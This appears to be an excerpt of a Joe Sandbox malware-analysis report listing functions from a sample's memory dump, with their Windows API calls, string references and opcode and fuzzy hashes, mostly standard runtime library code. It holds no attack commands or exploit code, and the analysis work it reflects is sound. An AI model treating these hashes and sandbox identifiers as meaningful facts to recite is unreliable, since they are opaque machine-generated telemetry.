GetACP.KERNEL32(?,?,?,?,?,?,0014D8F2,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0015913E
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0014D8F2,?,?,?,00000055,?,-00000050,?,?), ref: 00159169
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001592CC

Strings

utf8, xrefs: 0015923B

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 37df534123d6665ccf199a4c5bca791e4696ec18ba9a7e6f59711273d55db11b
Instruction ID: 82dadeecfbb54a22d2b7149e3f801d1a84f2769614bd93931fb9cd844d5b50c6
Opcode Fuzzy Hash: 37df534123d6665ccf199a4c5bca791e4696ec18ba9a7e6f59711273d55db11b
Instruction Fuzzy Hash: 4A712771600702EADB28AB75CC86BAB73ACEF54712F144429FD25DF181EB70E948C792

Uniqueness

Uniqueness Score: -1.00%

Function 00145992 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0014599E
IsDebuggerPresent.KERNEL32 ref: 00145A6A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00145A8A
UnhandledExceptionFilter.KERNEL32(?), ref: 00145A94

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 63abcdbfa060ff1c63badcf139c36219fd59401002208111bd5e3bb6486f6dbe
Instruction ID: f67f9506bea703d615e6909901c3b24ec324b52a7d6bb3ece8f55e385c241c11
Opcode Fuzzy Hash: 63abcdbfa060ff1c63badcf139c36219fd59401002208111bd5e3bb6486f6dbe
Instruction Fuzzy Hash: 8C311875D0531CDBDB20DFA4D989BCDBBB8AF18304F1041AAE40DAB290EB719A85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 00159490 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0014F810: GetLastError.KERNEL32(?,?,00149965,00168EF0,0000000C), ref: 0014F814
Part of subcall function 0014F810: SetLastError.KERNEL32(00000000), ref: 0014F8B6

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001594E4
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0015952E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001595F4

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 2f6168d05acf93d01d1e9bd0f95727bd6b36d454b8fed1636206b50e50a78bf0
Instruction ID: 797fc4aa8a3f09b9e709c46fe0795e7e04eadc03dff0c514c299afff634ac145
Opcode Fuzzy Hash: 2f6168d05acf93d01d1e9bd0f95727bd6b36d454b8fed1636206b50e50a78bf0
Instruction Fuzzy Hash: 4261BC71910207DFDB299F28CD82BAAB7A8EF14302F1441BAED25CA581F734D999CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001496E3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 001497DB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 001497E5
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 001497F2

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: cffa3b253993d356f0773aa824c6b59a91667e32871acbc5fcadc1e7cffbd1d6
Instruction ID: 2e5754e76af4653ed5a8f6d01faec392b090e4ffc8105fb04b2d42efcda15ba6
Opcode Fuzzy Hash: cffa3b253993d356f0773aa824c6b59a91667e32871acbc5fcadc1e7cffbd1d6
Instruction Fuzzy Hash: 2331B37490121C9BCB21DF68D889BCDBBB8BF18310F5041EAE80CA72A1E7709B858F55

Uniqueness

Uniqueness Score: -1.00%

Function 00142280 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 0014237A

Strings

ios_base::badbit set, xrefs: 00142290

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: Close
String ID: ios_base::badbit set
API String ID: 3535843008-3882152299
Opcode ID: 38d5e7483f72d5bd988911d83ea192a95627b79987cebc292ec025222483f2ef
Instruction ID: 432df8209a99b7e9b51a2bd8f6321c8552e59e9a9855d06c71e56250499106bd
Opcode Fuzzy Hash: 38d5e7483f72d5bd988911d83ea192a95627b79987cebc292ec025222483f2ef
Instruction Fuzzy Hash: 34619D756083018FC718DF28C89492AFBE1FF88344F594A2DF9959B361E735E9858B82

Uniqueness

Uniqueness Score: -1.00%

Function 001541FE Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,001541F9,?,?,?,?,?,?,00000000), ref: 0015442B

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3eaf0c961ea55757c0fac1b50270e8071a314e232dd0c7a69cbd6b0c94417abe
Instruction ID: ed5405f934806990fb5695084418e0af3919d668aefdde2ccb160c4fc0a7ccd4
Opcode Fuzzy Hash: 3eaf0c961ea55757c0fac1b50270e8071a314e232dd0c7a69cbd6b0c94417abe
Instruction Fuzzy Hash: E3B14F35610609DFD718CF28C48AB657BE0FF4536AF258658E8EACF2A1C335E995CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0014547C Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00145492

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: deb3b87947fa777ae369489d9ffea6989c92bf5b82597b45e521585d719917ad
Instruction ID: 05ef1c45e840613e6da21247460f389c5292712510c8fb10a28f4d4ea6af6435
Opcode Fuzzy Hash: deb3b87947fa777ae369489d9ffea6989c92bf5b82597b45e521585d719917ad
Instruction Fuzzy Hash: A9515EB1A05605CBDB28CF55DC857AEBBF2FB48310F65846AD405EB761D3B89980CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001564FA Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4406bfa9db46ee0cf8c14e2ca05546d886c238304093aed3f1b2f9133b1f2096
Instruction ID: 99dfebd9402fee9ca214cee43884c245750fe817a1a7bdfb7448f980bbb331e6
Opcode Fuzzy Hash: 4406bfa9db46ee0cf8c14e2ca05546d886c238304093aed3f1b2f9133b1f2096
Instruction Fuzzy Hash: FB41C5B580121DAFCF20DF69CC89AAABBB9EF55304F5442DDE419D7201EB319E898F50

Uniqueness

Uniqueness Score: -1.00%

Function 001596E3 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0014F810: GetLastError.KERNEL32(?,?,00149965,00168EF0,0000000C), ref: 0014F814
Part of subcall function 0014F810: SetLastError.KERNEL32(00000000), ref: 0014F8B6

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00159737

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b2be8483f02f283a7e32a97fe070b8356a4ace48bf03c6cbbd0e3257bd780b64
Instruction ID: d868fbc33672d185810c18d3d34d38eb212e94ac3d22e74a75f4bcc30943da99
Opcode Fuzzy Hash: b2be8483f02f283a7e32a97fe070b8356a4ace48bf03c6cbbd0e3257bd780b64
Instruction Fuzzy Hash: C621BE32624206EBDB289E25DC42ABA73A8EF18312F10407FFD11DA141EB34ED499B51

Uniqueness

Uniqueness Score: -1.00%

Function 0015936A Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0014F810: GetLastError.KERNEL32(?,?,00149965,00168EF0,0000000C), ref: 0014F814
Part of subcall function 0014F810: SetLastError.KERNEL32(00000000), ref: 0014F8B6

EnumSystemLocalesW.KERNEL32(00159490,00000001,00000000,?,-00000050,?,00159AC1,00000000,?,?,?,00000055,?), ref: 001593DC

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7eb6bc1cbfc846af03ae8175966df53f9c328c05a788c7ecda28f464fdf6181f
Instruction ID: 2d6fa69e4aa40450bcd69532b257c3113dcd54c32e37b20d7621b8f8e7797dab
Opcode Fuzzy Hash: 7eb6bc1cbfc846af03ae8175966df53f9c328c05a788c7ecda28f464fdf6181f
Instruction Fuzzy Hash: 7011E536600701DFDB189F39D8915BAB791FF80369B18842DE9978BA40D771B947CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00159912 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0014F810: GetLastError.KERNEL32(?,?,00149965,00168EF0,0000000C), ref: 0014F814
Part of subcall function 0014F810: SetLastError.KERNEL32(00000000), ref: 0014F8B6

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,001596AC,00000000,00000000,?), ref: 0015993E

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: aea74f729e2e817d995918ac15da0ef74d72f31592ffdccaed98a7eef7fb0a38
Instruction ID: 3b8f2c949b655ee5e9a3ebebe0308ab73d839925c56ca3f7489e50244a469bf9
Opcode Fuzzy Hash: aea74f729e2e817d995918ac15da0ef74d72f31592ffdccaed98a7eef7fb0a38
Instruction Fuzzy Hash: B1F08136A00212FBDB285B258805BBE7768EB41759F15442CED27AB180EF74EE46C6D2

Uniqueness

Uniqueness Score: -1.00%

Function 00159405 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0014F810: GetLastError.KERNEL32(?,?,00149965,00168EF0,0000000C), ref: 0014F814
Part of subcall function 0014F810: SetLastError.KERNEL32(00000000), ref: 0014F8B6

EnumSystemLocalesW.KERNEL32(001596E3,00000001,00000000,?,-00000050,?,00159A85,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0015944F

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: bfeb8b48f1d5bd4f9deafda6dc224860bb8b27603274bf4a7847ab070d1223f2
Instruction ID: 5afe1866d9d48d6d26a8c81dbda0c89fed8ac4cf9458425c2d12f0c6bfe9d2e8
Opcode Fuzzy Hash: bfeb8b48f1d5bd4f9deafda6dc224860bb8b27603274bf4a7847ab070d1223f2
Instruction Fuzzy Hash: E4F02232200304DFCB245F349881A6A7B95EB80329B04842DFE068F680C3B19C03C650

Uniqueness

Uniqueness Score: -1.00%

Function 0014FB9F Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0014B272: EnterCriticalSection.KERNEL32(?,?,0014F4E8,?,001691E0,00000008,0014F6AC,?,?,?), ref: 0014B281

EnumSystemLocalesW.KERNEL32(0014FB92,00000001,00169260,0000000C,00150001,00000000), ref: 0014FBD7

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: b883c6cda6e6713743a1811a40e52a3eaaa63e036e700d9f6afe77e0734b93c5
Instruction ID: b1b21871af81ef7bb5a1a996c331a500766aac27a4a67412d37c945ab1ab09b4
Opcode Fuzzy Hash: b883c6cda6e6713743a1811a40e52a3eaaa63e036e700d9f6afe77e0734b93c5
Instruction Fuzzy Hash: A5F04972A04204DFDB10EF98E882B9D77B0EB05721F10802AF800DB7A1C7B59981DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0015931F Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0014F810: GetLastError.KERNEL32(?,?,00149965,00168EF0,0000000C), ref: 0014F814
Part of subcall function 0014F810: SetLastError.KERNEL32(00000000), ref: 0014F8B6

EnumSystemLocalesW.KERNEL32(00159278,00000001,00000000,?,?,00159AE3,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00159356

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 03a8331a12f4382e41b725bd426487eedf9746c281b56d8e819f5d18143939d0
Instruction ID: 43c197af7bd95e4582ccc776205861739cecc713e868db5a0c35fa27d63abd54
Opcode Fuzzy Hash: 03a8331a12f4382e41b725bd426487eedf9746c281b56d8e819f5d18143939d0
Instruction Fuzzy Hash: C8F05536300205D7CB049F35E84566ABF94FFC1762F068069EE0A8F690C3329883C790

Uniqueness

Uniqueness Score: -1.00%

Function 00150105 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0014E458,?,20001004,00000000,00000002,?,?,0014DA5A), ref: 00150139

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 03073bee02d558c19606ec4d4d199329f1a076bf768b13ec6270f1e235a9d6b4
Instruction ID: a9807ba3c1e6dd1e52d8ce17b76c8259bff7abb255d352a3a0edab022b633574
Opcode Fuzzy Hash: 03073bee02d558c19606ec4d4d199329f1a076bf768b13ec6270f1e235a9d6b4
Instruction Fuzzy Hash: CAE04F3650061CFBCF232FA1EC05EAE7F16EF58752F048014FC156A260CB318DA1AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00145AF4 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005B00,00144F92), ref: 00145AF9

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c105c7b5f585729b3260c30cd668b1167a3186ad134c8a615a7df817c2576b0b
Instruction ID: b7aa4bcc8738b75b595e9ae9b33d0af304f92b9e58723ca99b2d122c670de770
Opcode Fuzzy Hash: c105c7b5f585729b3260c30cd668b1167a3186ad134c8a615a7df817c2576b0b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00159C43 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00159C43

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b593a51153e3ae58a8d7f360e18dc2479296d2f75353f828851ecd0723e423d7
Instruction ID: 5e3f952253503a6b54ddf6c53f479b73e083d895eb84d0e7dca2bb64c506ba0c
Opcode Fuzzy Hash: b593a51153e3ae58a8d7f360e18dc2479296d2f75353f828851ecd0723e423d7
Instruction Fuzzy Hash: 5FA00270505601CB57504F776E4564936A9674559571580559415C9560DB6444D05F01

Uniqueness

Uniqueness Score: -1.00%

Function 00154B29 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6905785243a3d0a1b1c7f3183bf650a14de74ad6349490c4e35e5bdeaa05bb44
Instruction ID: 92d02207db68f98cee7cabf0b82267852a6e43f7027b620bd50ce570c80d7bba
Opcode Fuzzy Hash: 6905785243a3d0a1b1c7f3183bf650a14de74ad6349490c4e35e5bdeaa05bb44
Instruction Fuzzy Hash: 2C321321D29F418DD7639638DC32336A249AFB73C5F15D727EC2AB9DA9EB6894C34100

Uniqueness

Uniqueness Score: -1.00%

Function 00158B2E Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

